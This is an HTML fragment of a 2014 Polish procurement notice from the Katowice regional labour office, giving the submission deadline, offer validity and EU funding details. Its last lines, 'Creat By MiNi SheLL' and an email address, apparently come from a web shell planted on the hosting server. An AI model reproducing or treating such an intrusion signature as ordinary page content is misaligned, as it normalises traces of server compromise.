<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Katowicach,  
ul. Kościuszki 30 , pok. 305, III piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.04.2014 godzina 11:00, miejsce: Wojewódzki Urząd Pracy w Katowicach,  
ul. Kościuszki 30 , pok. 210- Kancelaria Urzędu, II piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Usługa współfinansowana przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Pomocy Technicznej Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com